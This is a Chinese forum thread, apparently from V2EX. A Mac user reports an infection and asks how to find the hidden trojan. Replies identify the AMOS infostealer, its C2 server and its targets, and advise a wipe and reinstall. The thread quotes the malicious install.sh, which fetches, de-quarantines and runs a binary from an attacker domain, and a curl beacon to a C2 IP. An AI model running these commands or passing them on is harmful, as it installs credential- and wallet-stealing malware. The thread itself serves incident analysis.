最开始执行的文件是 install.sh ,内容如下
#!/bin/bash
curl -o /tmp/update https://dicoduweb.com/get15/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
通过在线网站检测出该 update 带有 MAC/Agent.FD!tr.pws 木马
监测网络后发现有一段 curl 不断运行如下指令,目前已禁用 curl 联网,通过浏览器访问下面连接请求头和响应都未能看出异常
curl -s http://45.94.47.149/api/tasks/vkBpuD+zjorGFc1q1N1a2g==
寻求大佬支支招,如何能找到这个隐藏到系统里的木马呢,使用了 Malwarebytes 扫描未查到任何异常,上面的 curl 仅一闪而过,未能看到调用 curl 的父进程
 |
1
petercui 11 小时 29 分钟前
这应该是个心跳检测的 API ,说是木马有点勉强吧。
|
 |
3
AkaGhost 4 小时 28 分钟前  1
@petercui 手动破坏一下 tasks/xxx 后面的 ID 串,服务器返回了一个 `Bad botid` 响应,感觉是 C2 服务器。
给定的 `https://dicoduweb.com/get15/update` 伪装了 404 错误,实际上只有 curl 的 User-Agent 才返回 payload 。我这里卡巴斯基已经报毒了: ``` 事件: 下载被拒绝 用户: BEELZEBUL\ghost 用户类型: 发起者 应用程序名称: curl.exe 应用程序路径: C:\Program Files\Git\mingw64\bin 组件: 安全浏览 结果描述: 已阻止 类型: 木马 名称: HEUR:Trojan-PSW.OSX.Amos.ba 精确度: 启发式分析 威胁级别: 高 对象类型: 文件 对象名称: arch1 对象路径: https://dicoduweb.com/get15/update// 对象的 MD5: 00CAC0E5943AD7AA4073462D8498D1A9 原因: 专家分析 数据库发布日期: 昨天,2025/9/28 23:22:00 ``` VirusTotal 上已经有人上传过样本了: https://www.virustotal.com/gui/file/143174d17e1e2f05e957e63ef6a8b4a6ac77165bad70c45ccb0dcd2ca39375f8 不知道是不是楼主上传的,2 小时前 (相对 9/29 0:48)。 微步沙箱我刚刚也上传了: https://s.threatbook.com/report/file/143174d17e1e2f05e957e63ef6a8b4a6ac77165bad70c45ccb0dcd2ca39375f8 行为带有虚拟机检测,明摆着检测 QEMU 。 Google 一下,这个家族已经活跃了有多时间了: https://www.google.com/search?q=amos%2Finfostl 这里有个详细的分析: https://www.trendmicro.com/en_gb/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html 主要目标是: * 系统配置文件信息 * 用户名和密码 * 主要各类浏览器的相关数据(包括 Cookies 等) * 加密钱包数据 * Telegram 会话数据 * OpenVPN 配置文件 * 钥匙串数据 * Apple Notes 数据 * 来自桌面、文档、下载文件夹和其它位置的个人文档( txt, pdf, docx, json, db, wallet, key ) 其它感染过程和具体行为 OP 请自行查看分析文章。 --- 事到如今就别想着移除,直接抹了系统重装吧。密码什么的也该改改吧。顺带一提这个样本很多杀毒软件的引擎都没能检出来…… |
Select Language